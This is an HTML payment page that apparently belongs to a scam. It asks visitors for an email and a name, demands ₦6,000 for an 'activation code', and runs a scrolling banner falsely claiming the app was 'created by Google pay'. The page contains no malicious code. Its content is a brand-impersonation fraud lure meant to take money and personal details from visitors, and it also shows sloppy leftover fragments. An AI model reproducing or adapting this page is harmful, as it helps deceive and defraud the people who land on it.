
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><script>
  <!-- code by https://www.html-code-generator.com -->
  </script> 
  
  
      
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Document</title>
  </head>
  <body>
  <style>
    * {
      margin: 0;
      padding: 0;
    }
    body{
      background: #4286F5;
    }
    .box {
      width: 95%;
      height: fit-content;
      background: white;
      margin: 0 auto ;
      margin-top: 30%;
      border-radius: 5px;
    }
    .box h2 {
       text-align: center;
    }
    .box p {
      padding-left: 19px;
      padding-top: 19px;
      font-size: 24px;
    }
    .form {
      width: 96%;
      height: fit-content;
      margin-left: 19px;
    }
    .form input, select, button {
      width: 90%;
      height: 43px;
      border-radius: 5px;
         border: 1px solid #4286F5;
    }
    .box button {
      background: #4286F5;
      color: white;
    }
  </style>
     
       <div class="box">
        <h2>Importrant Info</h2>
          <p>Input your correct information below  your actiavtional code will be sent to you via gmail,
            your pay amount is &#8358;6,000s ...
  
  
           </p><div class="form">
                <form action="payment1.html" method="get">
               
                  <input type="email" placeholder="Valid Email" required=""> <br>  <br>
                  <input type="text" placeholder="Name" required="">  <br> <br>
                  <!-- <p>where is my build? click <a href="build.html">here</a><br> </p>  -->
                <br> <br>
                <button>BUY!</button>     <marquee>Note: This app is the first adder app created by Google pay, make sure you pay to the app to get your logins, dont pay to anyone to avoid getting scam, if you need help contact app admin for more info...... Thank you for using our app ...... </marquee>
            </form>
           </div>
       </div>
  
  
     
       
  
  
    
    '))
  
  
  </body></html>